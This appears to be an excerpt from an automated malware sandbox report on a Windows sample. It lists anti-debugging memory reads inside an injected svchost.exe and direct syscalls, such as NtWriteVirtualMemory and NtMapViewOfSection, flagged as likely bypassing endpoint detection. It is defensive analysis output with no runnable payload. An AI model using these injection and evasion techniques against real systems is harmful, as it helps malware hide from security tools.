                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_001180A9
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EA124 SetUnhandledExceptionFilter,0_2_000EA124
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000EA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
